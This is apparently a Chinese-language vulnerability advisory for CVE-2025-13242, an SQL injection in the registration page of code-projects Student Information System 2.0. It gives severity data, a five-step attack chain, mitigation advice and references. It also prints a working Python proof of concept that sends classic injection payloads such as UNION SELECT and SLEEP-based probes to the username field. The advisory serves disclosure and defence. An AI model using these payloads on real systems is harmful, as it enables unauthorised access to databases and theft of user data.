CVE-2025-13242 code-projects Student Information System 2.0 /register.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13242

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Student Information System 2.0

漏洞概述

CVE-2025-13242是code-projects开源项目Student Information System 2.0版本中的一个高危SQL注入漏洞。该漏洞存在于注册页面/register.php文件中，攻击者可以通过构造恶意输入参数，在未授权的情况下远程利用此漏洞。漏洞的CVSS评分为7.3，属于高危级别，攻击复杂度低，无需任何认证或用户交互即可发起攻击。由于该漏洞的利用代码已公开披露，可能已被广泛利用，对使用该系统的教育机构和企业构成严重安全威胁。攻击成功可导致数据库敏感信息泄露、用户账户被劫持，甚至可能通过数据库写入操作实现远程代码执行。

技术细节

该SQL注入漏洞存在于Student Information System 2.0的/register.php注册页面。漏洞产生的根本原因是在处理用户注册输入时，未对用户提交的数据进行充分的输入验证和SQL语句参数化处理。攻击者可以通过在注册表单的用户名、邮箱或其他字段中插入SQL恶意payload，绕过前端验证，直接将注入代码提交到后端数据库执行。由于攻击向量为网络远程攻击（AV:N），无需认证（PR:N），攻击者可以在任何能够访问该系统的网络位置发起攻击。CVSS向量显示该漏洞对机密性、完整性和可用性均造成低等级影响（C:L/I:L/A:L），但在大规模利用场景下，可能造成更严重的数据泄露和系统瘫痪。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用的Student Information System 2.0，并定位到/register.php注册页面

STEP 2

步骤2

构造恶意payload：攻击者在注册表单字段中注入SQL注入语句，如使用UNION SELECT或布尔盲注技术

STEP 3

步骤3

发送攻击请求：通过HTTP POST请求将恶意payload提交到/register.php，绕过前端验证

STEP 4

步骤4

提取数据库数据：利用UNION注入或盲注技术获取数据库中的用户信息、密码哈希等敏感数据

STEP 5

步骤5

权限提升/持久化：利用获取的凭据登录后台系统，或进一步利用数据库写入功能实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import sys # CVE-2025-13242 SQL Injection PoC # Target: Student Information System 2.0 /register.php target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com/register.php' # SQL Injection payloads for testing payloads = [ "admin' OR '1'='1", "' OR 1=1--", "admin'--", "' UNION SELECT NULL--", "' AND SLEEP(5)--" ] def test_sql_injection(url, payload): data = { 'username': payload, 'email': '[email protected]', 'password': 'test123', 'submit': 'Register' } try: response = requests.post(url, data=data, timeout=10) return response except requests.exceptions.RequestException as e: print(f"Request failed: {e}") return None if __name__ == '__main__': print(f"Testing SQL injection on {target_url}") for payload in payloads: print(f"Testing payload: {payload}") resp = test_sql_injection(target_url, payload) if resp and ('error' in resp.text.lower() or 'sql' in resp.text.lower()): print(f"Potential vulnerability detected with payload: {payload}")

影响范围

code-projects Student Information System 2.0

防御指南

临时缓解措施

立即在/register.php页面部署临时防护措施，包括：启用Web应用防火墙规则拦截可疑SQL语句、对注册表单字段实施严格的输入长度和格式限制、关闭详细错误信息显示以防止信息泄露。同时建议使用ModSecurity等WAF工具添加SQL注入检测规则，在正式补丁发布前临时阻止该漏洞被利用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13242
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13242
3 Details https://www.cvedetails.com/cve/CVE-2025-13242/
4 VulDB https://vuldb.com/cve/CVE-2025-13242
5 Link https://code-projects.org/
6 Link https://github.com/asd1238525/cve/blob/main/SQL14.md
7 Link https://vuldb.com/?ctiid.332568
8 Link https://vuldb.com/?id.332568
9 Link https://vuldb.com/?submit.687527